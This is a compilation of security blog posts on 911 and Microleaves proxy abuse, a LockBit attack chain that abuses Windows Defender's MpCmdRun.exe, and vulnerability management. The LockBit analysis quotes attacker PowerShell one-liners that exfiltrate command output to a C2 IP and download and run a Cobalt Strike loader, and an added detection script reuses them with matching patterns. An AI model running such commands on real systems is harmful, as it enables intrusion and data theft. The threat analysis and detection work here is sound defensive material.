The Good, the Bad, and the Ugly in Cybersecurity – Week 31

The Good

The U.S. State Department is offering up to $10 million to people who offer tips that help law enforcement investigate and disrupt state-sponsored threat actor groups.

This week, the State Department’s official Rewards for Justice Twitter account announced an increase in reward money offered to people who come forward with information on members or individuals affiliated with state-sponsored threat groups. The tweet specifically called out Andariel, APT38, Bluenoroff, Guardians of Peace, Kimsuky, and Lazarus Group, as well as any groups that “are involved in targeting critical U.S. infrastructure in violation of the Computer Fraud and Abuse Act.”

These increases reflect the U.S. government’s growing scrutiny on state-sponsored threat actors in North Korea, which have previously attacked cryptocurrency exchanges, financial institutions, and most recently healthcare organizations. The State Department first issued a $5 million bounty for information that would disrupt North Korean cyber criminal activities in April 2020, before issuing another call to action in March of 2022, when DPRK-sponsored threat actors launched a series of attacks to fund the North Korean government’s operations.

In light of other successful operations to disrupt international cyber criminals, it’s encouraging to see the U.S. government turn its attention to such notorious threat actors.

The Bad

On Tuesday, NetStandard, a Kansas-based MSP, suffered a cyber attack which forced the company to shut down its cloud-based services.

In an email to its customers, NetStandard disclosed that it had detected signs of a cyber attack in the environment hosting its MyAppsAnywhere cloud services, which include Hosted GP, Hosted CRM, Hosted Exchange, and Hosted SharePoint.

Although the email also assured MyAppsAnywhere customers that none of NetStandard’s other services were impacted at the time of publication, NetStandard’s website was temporarily shut down following the incident. After initially detecting signs of an attack, the NetStandard team shut down its MyAppsAnywhere services, opened an active incident bridge to keep the attackers from causing further damage, and immediately contacted its insurance provider to engage a third-party cybersecurity firm for remediation support and restoration of NetStandard’s services.

Since the initial disclosure, NetStandard has not provided public-facing updates to non-customers about the outages. However, security researchers believe that NetStandard was likely hit by ransomware, since ransomware operators such as the REvil gang have previously targeted MSPs to reach their client base. By compromising an MSP’s clients, threat actors can extort multiple victims at once, increasing both the money they can demand and the damage they can cause.

MSPs play a valuable role in keeping small and medium-sized businesses up and running, and it’s incredibly unfortunate that threat actors are targeting providers like NetStandard to reach a large number of smaller businesses. As the U.S. government continues to warn MSPs that they are at risk, we encourage MSPs to adopt recommended best practices to secure their environments and their customer data.

The Ugly

A private sector offensive actor (PSOA) has uncovered and used multiple Windows zero-day exploits in targeted cyber attacks.

In a recent report, researchers from Microsoft’s MSTIC identified the actor behind a cluster of threat activity it tracks as ‘KNOTWEED’ as being DSIRF, an Austria-based surveillance outfit that made the news for developing and selling Subzero, a malware toolkit that targets phones, computers and other internet-connected devices.

DSIRF, the report says, deployed Subzero in attacks targeting Microsoft customers in Europe and Central America, including banks, law firms, and strategic consultancies. In particular, DSIRF exploited CVE-2021-31199 and CVE-2021-31201, two Windows privilege escalation vulnerabilities, before they were patched in 2021. A third Windows privilege escalation vulnerability, later patched as CVE-2021-36948, was also used to drop the Subzero malware. The researchers found that the attack chain involved a malicious DLL signed by ‘DSIRF GmbH’.

Unlike other private sector offensive actors, DSIRF appear to run both access-as-a-service and hack-for-hire operations. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the PSOA, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that DSIRF may blend these models.

The private sector offensive actor space has been a cause of concern for some time now, with this just the latest of multiple cases coming to light of their involvement in areas that go far beyond their stated remit of aiding and abetting law enforcement agencies in pursuit of terrorist or criminal enterprises. Attacks on civil rights campaigners, dissidents, journalists and legitimate political opponents are increasingly being supported or undertaken by PSOA products or personnel.

911 Proxy Service Implodes After Disclosing Breach

The 911 service as it existed until July 28, 2022.

911[.]re, a proxy service that since 2015 has sold access to hundreds of thousands of Microsoft Windows computers daily, announced this week that it is shutting down in the wake of a data breach that destroyed key components of its business operations. The abrupt closure comes ten days after KrebsOnSecurity published an in-depth look at 911 and its connections to shady pay-per-install affiliate programs that secretly bundled 911’s proxy software with other titles, including “free” utilities and pirated software.

911[.]re was one of the original “residential proxy” networks, which allow someone to rent a residential IP address to use as a relay for his/her Internet communications, providing anonymity and the advantage of being perceived as a residential user surfing the web.

Residential proxy services are often marketed to people seeking the ability to evade country-specific blocking by the major movie and media streaming providers. But some of them — like 911 — build their networks in part by offering “free VPN” or “free proxy” services that are powered by software which turns the user’s PC into a traffic relay for other users. In this scenario, users indeed get to use a free VPN service, but they are often unaware that doing so will turn their computer into a proxy that lets others use their Internet address to transact online.

From a website’s perspective, the IP traffic of a residential proxy network user appears to originate from the rented residential IP address, not from the proxy service customer. These services can be used in a legitimate manner for several business purposes — such as price comparisons or sales intelligence — but they are massively abused for hiding cybercrime activity because they can make it difficult to trace malicious traffic to its original source.

As noted in KrebsOnSecurity’s July 19 story on 911, the proxy service operated multiple pay-per-install schemes that paid affiliates to surreptitiously bundle the proxy software with other software, continuously generating a steady stream of new proxies for the service.

A cached copy of flashupdate[.]net circa 2016, which shows it was the homepage of a pay-per-install affiliate program that incentivized the silent installation of 911’s proxy software.

Within hours of that story, 911 posted a notice at the top of its site, saying, “We are reviewing our network and adding a series of security measures to prevent misuse of our services. Proxy balance top-up and new user registration are closed. We are reviewing every existing user, to ensure their usage is legit and [in] compliance with our Terms of Service.”

At this announcement, all hell broke loose on various cybercrime forums, where many longtime 911 customers reported they were unable to use the service. Others affected by the outage said it seemed 911 was trying to implement some sort of “know your customer” rules — that maybe 911 was just trying to weed out those customers using the service for high volumes of cybercriminal activity.

Then on July 28, the 911 website began redirecting to a notice saying, “We regret to inform you that we permanently shut down 911 and all its services on July 28th.”

According to 911, the service was hacked in early July, and it was discovered that someone manipulated the balances of a large number of user accounts. 911 said the intruders abused an application programming interface (API) that handles the topping up of accounts when users make financial deposits with the service.

“Not sure how did the hacker get in,” the 911 message reads. “Therefore, we urgently shut down the recharge system, new user registration, and an investigation started.”

The parting message from 911 to its users, posted to the homepage July 28, 2022.

However the intruders got in, 911 said, they managed to also overwrite critical 911[.]re servers, data and backups of that data.

“On July 28th, a large number of users reported that they could not log in the system,” the statement continues. “We found that the data on the server was maliciously damaged by the hacker, resulting in the loss of data and backups. Its [sic] confirmed that the recharge system was also hacked the same way. We were forced to make this difficult decision due to the loss of important data that made the service unrecoverable.”

Operated largely out of China, 911 was an enormously popular service across many cybercrime forums, and it became something akin to critical infrastructure for this community after two of 911’s longtime competitors, the malware-based proxy services VIP72 and LuxSocks, closed their doors in the past year.

Now, many on the crime forums who relied on 911 for their operations are wondering aloud whether there are any alternatives that match the scale and utility that 911 offered. The consensus seems to be a resounding “no.”

I’m guessing we may soon learn more about the security incidents that caused 911 to implode. And perhaps other proxy services will spring up to meet what appears to be a burgeoning demand for such services at the moment, with comparatively little supply.

In the meantime, 911’s absence may coincide with a measurable (if only short-lived) reprieve in unwanted traffic to top Internet destinations, including banks, retailers and cryptocurrency platforms, as many former customers of the proxy service scramble to make alternative arrangements.

Riley Kilmer, co-founder of the proxy-tracking service Spur.us, said 911’s network will be difficult to replicate in the short run.

“My speculation is [911’s remaining competitors] are going to get a major boost in the short term, but a new player will eventually come along,” Kilmer said. “None of those are good replacements for LuxSocks or 911. However, they will all allow anyone to use them. For fraud rates, the attempts will continue but through these replacement services which should be easier to monitor and stop. 911 had some very clean IP addresses.”

911 wasn’t the only major proxy provider disclosing a breach this week tied to unauthenticated APIs: On July 28, KrebsOnSecurity reported that internal APIs exposed to the web had leaked the customer database for Microleaves, a proxy service that rotates its customers’ IP addresses every five to ten minutes. That investigation showed Microleaves — like 911 — had a long history of using pay-per-install schemes to spread its proxy software.

Living Off Windows Defender | LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool

LockBit has been receiving a fair share of attention recently. Last week, SentinelLabs reported on LockBit 3.0 (aka LockBit Black), describing how the latest iteration of this increasingly prevalent RaaS implemented a series of anti-analysis and anti-debugging routines. Our research was quickly followed up by others reporting similar findings. Meanwhile, back in April, SentinelLabs reported on how a LockBit affiliate was leveraging the legitimate VMware command line utility, VMwareXferlogs.exe, in a live engagement to side load Cobalt Strike.

In this post, we follow up on that incident by describing another legitimate tool used to similar effect by a LockBit operator or affiliate, only this time the tool in question turns out to be part of a security product: Windows Defender. During a recent investigation, we found that threat actors were abusing the Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.

Overview

The initial target compromise happened via the Log4j vulnerability against an unpatched VMware Horizon Server. The attackers modified the Blast Secure Gateway component of the application, installing a web shell using PowerShell code documented here.

Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire and a new way to side-load Cobalt Strike.

In particular, when the attackers attempted to execute Cobalt Strike, we observed a new legitimate tool being used to side-load a malicious DLL that decrypts the payload.

We also observed previously documented defense-evasion techniques that remove EDR/EPP userland hooks, Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI) instrumentation.

Attack Chain

Once the attackers gained initial access via the Log4j vulnerability, reconnaissance began: PowerShell was used to execute commands and exfiltrate their output, base64-encoded, in an HTTP POST request to an attacker-controlled IP address. Examples of the reconnaissance activity can be seen below:

powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((whoami)))))
powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((nltest /domain_trusts)))))

Once the threat actor acquired sufficient privileges, they attempted to download and execute multiple post-exploitation payloads.

The threat actor downloads a malicious DLL, the encrypted payload and the legitimate tool from the C2 server they control:

powershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/mpclient.dll -OutFile c:\windows\help\windows\mpclient.dll;Invoke-WebRequest -uri http://45.32.108[.]54:443/c0000015.log -OutFile c:\windows\help\windows\c0000015.log;Invoke-WebRequest -uri http://45.32.108[.]54:443/MpCmdRun.exe -OutFile c:\windows\help\windows\MpCmdRun.exe;c:\windows\help\windows\MpCmdRun.exe

Notably, the threat actor leverages the legitimate Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.

We also note the correlation between the IP address used to download the Cobalt Strike payload and the IP address used for reconnaissance: shortly after downloading Cobalt Strike, the threat actor tried to execute it and send the output to the IP address beginning with 139, as can be seen in both snippets below.

powershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/glib-2.0.dll -OutFile c:\users\public\glib-2.0.dll;Invoke-WebRequest -uri http://45.32.108[.]54:443/c0000013.log -OutFile c:\users\public\c0000013.log;Invoke-WebRequest -uri http://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile c:\users\public\VMwareXferlogs.exe;c:\users\public\VMwareXferlogs.exe
powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((c:\users\public\VMwareXferlogs.exe)))))

Following the same flow as the side-loading of the VMwareXferlogs.exe utility reported on previously, MpCmdRun.exe is abused to side-load a weaponized mpclient.dll, which loads and decrypts Cobalt Strike Beacon from the c0000015.log file.

As such, the components used in the attack specifically related to the use of the Windows Defender command line tool are:

Filename        Description
mpclient.dll    Weaponized DLL loaded by MpCmdRun.exe
MpCmdRun.exe    Legitimate, signed Microsoft Defender utility
C0000015.log    Encrypted Cobalt Strike payload
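Detection logic for the two behaviours in this attack chain, a side-loadable signed binary (MpCmdRun.exe, VMwareXferlogs.exe) started from a directory it does not ship in, and PowerShell POSTing base64-encoded command output to a bare IP address, run over constructed process-creation events. This is an added example, not code from the SentinelLabs post; the expected install directories and the event field names are assumptions.

```python
import json
import re
from pathlib import PureWindowsPath
from typing import Optional

# Signed binaries the post describes being abused for DLL side-loading, the
# directories a default install launches them from (assumed here, not taken
# from the post) and the DLL each one resolves from its own directory.
SIDELOAD_TARGETS = {
    "mpcmdrun.exe": {
        "expected_dirs": (
            r"c:\program files\windows defender",
            r"c:\programdata\microsoft\windows defender\platform",
        ),
        "dll": "mpclient.dll",
    },
    "vmwarexferlogs.exe": {
        "expected_dirs": (r"c:\program files\vmware\vmware tools",),
        "dll": "glib-2.0.dll",
    },
}

# An IPv4 literal inside a URI; also accepts the defanged "[.]" form used on
# the page so the sample events below can be written exactly as the post shows.
IP_URI = re.compile(r"https?://(?:\d{1,3}(?:\[\.\]|\.)){3}\d{1,3}", re.IGNORECASE)
# "-met POST" is PowerShell's abbreviated -Method parameter of Invoke-WebRequest
# ("curl" is an alias for the same cmdlet).
POST_METHOD = re.compile(r"-met(?:hod)?\s+POST\b", re.IGNORECASE)


def _under(path: PureWindowsPath, directory: str) -> bool:
    """True when *path* sits below *directory* (case-insensitive)."""
    parts = [p.lower() for p in path.parts]
    want = [p.lower() for p in PureWindowsPath(directory).parts]
    return parts[: len(want)] == want


def check_sideload(event: dict) -> Optional[str]:
    """Flag a side-loadable signed binary started outside its install path."""
    image = PureWindowsPath(event["image"])
    target = SIDELOAD_TARGETS.get(image.name.lower())
    if target is None or any(_under(image, d) for d in target["expected_dirs"]):
        return None
    return (f"{image.name} started from {image.parent}; expected under "
            f"{target['expected_dirs'][0]}; look for a rogue {target['dll']} beside it")


def check_encoded_post(event: dict) -> Optional[str]:
    """Flag PowerShell that base64-encodes output and POSTs it to a bare IP."""
    if PureWindowsPath(event["image"]).name.lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event.get("command_line", "")
    if "tobase64string" in cmd.lower() and POST_METHOD.search(cmd) and IP_URI.search(cmd):
        return "PowerShell POSTs base64-encoded command output to a raw IP address"
    return None


def scan(lines):
    """Run both rules over JSON process-creation events; return (pid, rule, detail)."""
    findings = []
    for line in lines:
        event = json.loads(line)
        for rule in (check_sideload, check_encoded_post):
            detail = rule(event)
            if detail:
                findings.append((event["pid"], rule.__name__, detail))
    return findings


# Constructed process-creation events (not real telemetry). Events 1, 2 and 4
# reproduce the command line and file paths quoted in the post; 3 and 5 are
# controls that should not fire (a normal Defender scan, a plain download).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 1, "image": PS, "command_line":
        "powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body "
        "([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((whoami)))))"},
    {"pid": 2, "image": r"c:\windows\help\windows\MpCmdRun.exe", "command_line": ""},
    {"pid": 3, "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "command_line": "MpCmdRun.exe -Scan -ScanType 1"},
    {"pid": 4, "image": r"c:\users\public\VMwareXferlogs.exe", "command_line": ""},
    {"pid": 5, "image": PS, "command_line":
        "powershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/mpclient.dll "
        r"-OutFile c:\windows\help\windows\mpclient.dll"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for pid, rule, detail in scan(SAMPLE_LOG):
        print(f"pid {pid}: [{rule}] {detail}")
```

The path rule is the higher-signal one: a genuine MpCmdRun.exe under C:\Windows\Help\ is never expected, whereas the POST rule needs tuning against legitimate automation that talks to bare IP addresses.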

Conclusion

Defenders need to be alert to the fact that LockBit ransomware operators and affiliates are exploring and exploiting novel “living off the land” tools to aid them in loading Cobalt Strike beacons and evading some common EDR and traditional AV detection tools.

Importantly, any tool for which either the organization or the organization’s security software has made an exception deserves careful scrutiny. Products like VMware and Windows Defender have a high prevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed security controls.

Indicators of Compromise


Breach Exposes Users of Microleaves Proxy Service

Microleaves, a ten-year-old proxy service that lets customers route their web traffic through millions of Microsoft Windows computers, recently fixed a vulnerability in their website that exposed their entire user database. Microleaves claims its proxy software is installed with user consent, but data exposed in the breach shows the service has a lengthy history of being supplied with new proxies by affiliates incentivized to distribute the software any which way they can — such as by secretly bundling it with other titles.

The Microleaves proxy service, which is in the process of being rebranded to Shifter[.]io.

Launched in 2013, Microleaves is a service that allows customers to route their Internet traffic through PCs in virtually any country or city around the globe. Microleaves works by changing each customer’s Internet Protocol (IP) address every five to ten minutes.

The service, which accepts PayPal, Bitcoin and all major credit cards, is aimed primarily at enterprises engaged in repetitive, automated activity that often results in an IP address being temporarily blocked — such as data scraping, or mass-creating new accounts at some service online.

In response to a report about the data exposure from KrebsOnSecurity, Microleaves said it was grateful for being notified about a “very serious issue regarding our customer information.”

Abhishek Gupta is the PR and marketing manager for Microleaves, which he said is in the process of being rebranded to “Shifter.io.” Gupta said the report qualified as a “medium” severity security issue in Shifter’s brand new bug bounty program (the site makes no mention of a bug bounty), which he said offers up to $2,000 for reporting data exposure issues like the one they just fixed. KrebsOnSecurity declined the offer and requested that Shifter donate the amount to the Electronic Frontier Foundation (EFF), a digital rights group.

From its inception nearly a decade ago, Microleaves has claimed to lease between 20-30 million IPs via its service at any time. Riley Kilmer, co-founder of the proxy-tracking service Spur.us, said that 20-30 million number might be accurate for Shifter if measured across a six-month time frame. Currently, Spur is tracking roughly a quarter-million proxies associated with Microleaves/Shifter each day, with a high rate of churn in IPs.

Early on, this rather large volume of IP addresses led many to speculate that Microleaves was just a botnet which was being resold as a commercial proxy service.

Proxy traffic related to top Microleaves users, as exposed by the website’s API.

The very first discussion thread started by the new user Microleaves on the forum BlackHatWorld in 2013 sought forum members who could help test and grow the proxy network. At the time, the Microleaves user said their proxy network had 150,000 IPs globally, and was growing quickly.

One of BlackHatWorld’s moderators asked the administrator of the forum to review the Microleaves post.

“User states has 150k proxies,” the forum skeptic wrote. “No seller on BHW has 150k working daily proxies none of us do. Which hints at a possible BOTNET. That’s the only way you will get 150k.”

Microleaves has long been classified by antivirus companies as adware or as a “potentially unwanted program” (PUP), the euphemism that antivirus companies use to describe executable files that get installed with ambiguous consent at best, and are often part of a bundle of software tied to some “free” download. Security vendor Kaspersky flags the Microleaves family of software as a trojan horse program that commandeers the user’s Internet connection as a proxy without notifying the user.

“While working, these Trojans pose as Microsoft Windows Update,” Kaspersky wrote.

In a February 2014 post to BlackHatWorld, Microleaves announced that its sister service — reverseproxies[.]com — was now offering an “Auto CAPTCHA Solving Service,” which automates the solving of those squiggly and sometimes frustrating puzzles that many websites use to distinguish bots from real visitors. The CAPTCHA service was offered as an add-on to the Microleaves proxy service, and ranged in price from $20 for a 2-day trial to $320 for solving up to 80 captchas simultaneously.

“We break normal Recaptcha with 60-90% success rate, recaptcha with blobs 30% success, and 500+ other captcha,” Microleaves wrote. “As you know all success rate on recaptcha depends very much on good proxies that are fresh and not spammed!”

WHO IS ACIDUT?

The exposed Microleaves user database shows that the first user created on the service — username “admin” — used the email address alex.iulian@aol.com. A search on that email address in Constella Intelligence, a service that tracks breached data, reveals it was used to create an account at the link shortening service bit.ly under the name Alexandru Florea, and the username “Acidut.” [Full disclosure: Constella is currently an advertiser on this website].

According to the cyber intelligence company Intel 471, a user named Acidut with the email address iulyan87_4u@gmail.com had an active presence on almost a dozen shadowy money-making and cybercrime forums from 2010 to 2017, including BlackHatWorld, Carder[.]pro, Hackforums, OpenSC, and CPAElites.

The user Microleaves (later “Shifter.io”) advertised on BlackHatWorld the sale of 31 million residential IPs for use as proxies, in late 2013. The same account continues to sell subscriptions to Shifter.io.

In a 2011 post on Hackforums, Acidut said they were building a botnet using an “exploit kit,” a set of browser exploits made to be stitched into hacked websites and foist malware on visitors. Acidut claimed their exploit kit was generating 3,000 to 5,000 new bots each day. OpenSC was hacked at one point, and its private messages show Acidut purchased a license from Exmanoize, the handle used by the creator of the Eleonore Exploit Kit.

By November 2013, Acidut was advertising the sale of “26 million SOCKS residential proxies.” In a March 2016 post to CPAElites, Acidut said they had a worthwhile offer for people involved in pay-per-install or “PPI” schemes, which match criminal gangs who pay for malware installs with enterprising hackers looking to sell access to compromised PCs and websites.

Because pay-per-install affiliate schemes rarely impose restrictions on how the software can be installed, such programs can be appealing for cybercriminals who already control large collections of hacked machines and/or compromised websites. Indeed, Acidut went a step further, adding that their program could be quietly and invisibly nested inside of other programs.

“For those of you who are doing PPI I have a global offer that you can bundle to your installer,” Acidut wrote. “I am looking for many installs for an app that will generate website visits. The installer has a silence version which you can use inside your installer. I am looking to buy as many daily installs as possible worldwide, except China.”

Asked about the source of their proxies in 2014, the Microleaves user responded that it was “something related to a PPI network. I can’t say more and I won’t get into details.”

Acidut authored a similar message on the forum BlackHatWorld in 2013, where they encouraged users to contact them on Skype at the username “nevo.julian.” That same Skype contact address was listed prominently on the Microleaves homepage up until about a week ago when KrebsOnSecurity first reached out to the company.

ONLINE[.]IO (NOW MERCIFULLY OFFLINE)

There is a Facebook profile for an Alexandru Iulian Florea from Constanta, Romania, whose username on the social media network is Acidut. Prior to KrebsOnSecurity alerting Shifter of its data breach, the Acidut profile page associated Florea with the websites microleaves.com, shrooms.io, leftclick[.]io, and online[.]io. Mr. Florea did not respond to multiple requests for comment, and his Facebook page no longer mentions these domains.

Leftclick and online[.]io emerged as subsidiaries of Microleaves between 2017 and 2018. According to a help wanted ad posted in 2018 for a developer position at online[.]io, the company’s services were brazenly pitched to investors as “a cybersecurity and privacy tool kit, offering extensive protection using advanced adblocking, anti-tracking systems, malware protection, and revolutionary VPN access based on residential IPs.”

A teaser from Irish Tech News.

“Online[.]io is developing the first fully decentralized peer-to-peer networking technology and revolutionizing the browsing experience by making it faster, ad free, more reliable, secure and non-trackable, thus freeing the Internet from annoying ads, malware, and trackers,” reads the rest of that help wanted ad.

Microleaves CEO Alexandru Florea gave an “interview” to the website Irishtechnews.ie in 2018, in which he explained how Online[.]io (OIO) was going to upend the online advertising and security industries with its initial coin offering (ICO). The word interview is in air quotes because the following statements by Florea deserved some serious pushback by the interviewer.

“Online[.]io solution, developed using the Ethereum blockchain, aims at disrupting the digital advertising market valued at more than $1 trillion USD,” Alexandru enthused. “By staking OIO tokens and implementing our solution, the website operators will be able to access a new non-invasive revenue stream, which capitalizes on time spent by users online.”

“At the same time, internet users who stake OIO tokens will have the opportunity to monetize on the time spent online by themselves and their peers on the World Wide Web,” he continued. “The time spent by users online will lead to ICE tokens being mined, which in turn can be used in the dedicated merchant system or traded on exchanges and consequently changed to fiat.”

Translation: If you install our proxy bot/CAPTCHA-solver/ad software on your computer — or as an exploit kit on your website — we’ll make millions hijacking ads and you will be rewarded with heaps of soon-to-be-worthless shitcoin. Oh, and all your security woes will disappear, too.

It’s unclear how many Internet users and websites willingly agreed to get bombarded with Online[.]io’s annoying ads and search hijackers — and to have their PC turned into a proxy or CAPTCHA-solving zombie for others. But that is exactly what multiple security companies said happened when users encountered online[.]io, which operated using the Microsoft Windows process name of “online-guardian.exe.”

Incredibly, Crunchbase says Online[.]io raised $6 million in funding for an initial coin offering in 2018, based on the plainly ludicrous claims made above. Since then, however, online[.]io seems to have gone…offline, for good.

SUPER TECH VENTURES?

Until this week, Shifter.io’s website also exposed information about its customer base and most active users, as well as how much money each client has paid over the lifetime of their subscription. The data indicates Shifter has earned more than $11.7 million in direct payments, although it’s unclear how far back in time those payment records go, or how complete they are.

The bulk of Shifter customers who spent more than $100,000 at the proxy service appear to be digital advertising companies, including some located in the United States. None of the several Shifter customers approached by KrebsOnSecurity agreed to be interviewed.

Shifter’s Gupta said he’d been with the company for three years, since the new owner took over the company and made the rebrand to Shifter.

“The company has been on the market for a long time, but operated under a different brand called Microleaves, until new ownership and management took over the company started a reorganization process that is still on-going,” Gupta said. “We are fully transparent. Mostly [our customers] work in the data scraping niche, this is why we actually developed more products in this zone and made a big shift towards APIs and integrated solutions in the past year.”

Ah yes, the same APIs and integrated solutions that were found exposed to the Internet and leaking all of Shifter’s customer information.

Gupta said the original founder of Microleaves was a man from India, who later sold the business to Florea. According to Gupta, the Romanian entrepreneur had multiple issues in trying to run the company, and then sold it three years ago to the current owner — Super Tech Ventures, a private equity company based in Taiwan.

“Our CEO is Wang Wei, he has been with the company since 3 years ago,” Gupta said. “Mr. Florea left the company two years ago after ending this transition period.”

Google and other search engines seem to know nothing about a Super Tech Ventures based in Taiwan. Incredibly, Shifter’s own PR person claimed that he, too, was in the dark on this subject.

“I would love to help, but I really don’t know much about the mother company,” Gupta said, essentially walking back his “fully transparent” statement. “I know they are a branch of the bigger group of asian investment firms focused on private equity in multiple industries.”

Adware and proxy software are often bundled together with “free” software utilities online, or with popular software titles that have been pirated and quietly fused with installers tied to various PPI affiliate schemes.

But just as often, these intrusive programs will include some type of notice — even if installed as part of a software bundle — that many users simply do not read and click “Next” to get on with installing whatever software they’re seeking to use. In these cases, selecting the “basic” or “default” settings while installing usually hides any per-program installation prompts, and assumes you agree to all of the bundled programs being installed. It’s always best to opt for the “custom” installation mode, which can give you a better idea of what is actually being installed, and can let you control certain aspects of the installation.

Either way, it’s best to start with the assumption that if a software or service online is “free,” that there is likely some component involved that allows the provider of that service to monetize your activity. As KrebsOnSecurity noted at the conclusion of last week’s story on a China-based proxy service called 911, the rule of thumb for transacting online is that if you’re not the paying customer, then you and/or your devices are probably the product that’s being sold to others.

Further reading on proxy services:

July 18, 2022: A Deep Dive Into the Residential Proxy Service ‘911’
June 28, 2022: The Link Between AWM Proxy & the Glupteba Botnet
June 22, 2022: Meet the Administrators of the RSOCKS Proxy Botnet
Sept. 1, 2021: 15-Year-Old Malware Proxy Network VIP72 Goes Dark
Aug. 19, 2019: The Rise of “Bulletproof” Residential Networks

How to Modernize Vulnerability Management in Today’s Evolving Threat Landscape

Looking at Gartner’s Top Trends in Cybersecurity 2022 report, it is not surprising that attack surface expansion is ranked as the highest priority. The ever-expanding digital footprint of modern organizations continually exposes software vulnerabilities and presents threat actors with a growing attack surface. The larger the target, the harder it is to miss.

Meanwhile, many organizations continue to rely on traditional vulnerability management solutions, risk assessments, and a lengthy list of patches and security control changes that must be applied manually. That this isn’t working is evidenced by statistics such as nearly 70% of organizations remaining vulnerable to WannaCry, and over 80% of organizations believing they are vulnerable to breaches caused by misconfigurations.

This post explores how today’s threat landscape has evolved, putting unbearable pressure on security teams struggling with current vulnerability management practices. We then explore some best practices for vulnerability management and discuss how AI paired with human ingenuity can help modernize vulnerability management.

Why a New Approach to Vulnerability Management Is Needed

The number of reported and exploitable vulnerabilities continues to increase. In Q1 2022, 8,000 new vulnerabilities were confirmed. Looking across all reported vulnerabilities in CVE Details, 11% have a critical score. Furthermore, Edgescan’s 2022 Vulnerability Statistics Report confirmed that one in ten vulnerabilities in internet-facing applications is considered a high or critical risk.

With many organizations today leveraging cloud services, there has also been a lot of focus by both the research community and threat actors on identifying cloud vulnerabilities. When examining all the reported vulnerabilities, it is clear that Microsoft products account for many of the reported vulnerabilities rated as critical. Many of these cloud vulnerabilities depend on the Cloud Service Provider (CSP) for resolution.

Looking across software and cloud vulnerabilities, it is clear that as an industry we have a large attack surface, so it is not surprising that the threat landscape continues to evolve rapidly. According to IBM, the average breach lifecycle is 287 days. Today, most malware is polymorphic, meaning its identifiable features constantly change to evade traditional defense mechanisms. Cybercriminals increasingly leverage “living off the land” (LotL) techniques, using the operating system’s or the user’s own binaries for malicious activity.

Furthermore, with many modern applications and cloud services not configured with security in mind, threat actors increasingly target service misconfigurations to break into an environment. In such a rapidly evolving threat landscape, many existing security tools and processes can no longer scale and provide sufficient coverage for an organization.

In light of the increase of discovered vulnerabilities, the evolving sophistication of the threat landscape, and the exponential growth of the digital estate, we require a new approach to how organizations manage vulnerability assessment and mitigation.

What’s Wrong With Vulnerability Management Today?

Historically, many organizations relied on traditional Threat and Vulnerability Management (TVM) solutions and professional services to perform point-in-time scans of an environment to identify possible vulnerabilities and misconfigurations; the security team would then need to act manually on the often lengthy list of required mitigations. At least, that is the theory of how organizations should handle vulnerabilities.

In practice, however, many of the identified mitigations, such as pending operating system or application patches or adjustments to security controls, would not be applied due to a lack of resources or the complexity of the required change. A couple of months later, when the security team did another assessment, it would find the same remediation recommendations again.

It is alarming that today many security consultants confirm that after six to twelve months, they could almost reuse the same risk report when they visit the same organization for another risk assessment, because the organization did not implement the required changes. This is shocking not only from a security perspective but also from a financial and risk perspective. Essentially, many organizations regularly pay for risk assessments, but their overall risk level isn’t improving.

With all that in mind, organizations are often barely able to focus on patching critical vulnerabilities in their operating systems and don’t have the resources to focus on anything beyond that, leaving a significant attack surface open for cybercriminals in their identity, application, and cloud infrastructure.

Looking at today’s challenges and limitations with vulnerability management programs, as defenders we require a new approach to managing risks from vulnerabilities across our digital estate: one that allows human operators to focus and prioritize while Artificial Intelligence provides real-time asset discovery, vulnerability detection, risk assessment, and automatic remediation of cyber risks.

Vulnerability Management Best Practices

1. Conduct Real-Time Surface Discovery

Unmanaged assets like endpoints, mobile devices, IoT devices, and Software-as-a-Service (SaaS) applications are a significant risk to organizations. Research by DoControl identified that up to 40% of SaaS data access is unmanaged. As such, for an organization to identify its entire attack surface, it must first be able to locate all of its assets. Simply put, you can’t protect what you don’t know exists. To aid this effort, modern vulnerability management solutions include asset discovery capabilities that use managed assets as beacons to discover unmanaged assets in the environment.

2. Use Continuous Vulnerability Assessment

With the sheer volume of vulnerabilities, the traditional approach of bringing in a third-party consultant for a periodic risk assessment has become obsolete. Today, technology can perform continuous, real-time vulnerability detection and analysis. Modern vulnerability management solutions do this by leveraging cloud processing power and Artificial Intelligence (AI) to do continuously, and in real time, what traditional periodic and manual risk assessments would do. These solutions start by continuously scanning all assets against vendor and industry best practices such as CIS benchmarks. Essentially, the solution validates the current state against configuration baselines and best practices.

3. Understand Your Risk and Exposure

Not all vulnerabilities are equally important. Let’s start by understanding the different types of vulnerabilities:

  • Unpatched Software: Unpatched software, regardless of whether we talk about the operating system or user applications, is often the first thing that comes to mind when looking into vulnerability management. Cybercriminals can use these unpatched vulnerabilities to break into an environment or steal sensitive data.
  • Weak Authorization: Cybercriminals leverage weak authorization protocols and weak password policies to brute force their way into an environment. That is why adopting modern authentication methods, Conditional Access, and Multi-Factor Authentication (MFA) is critical.
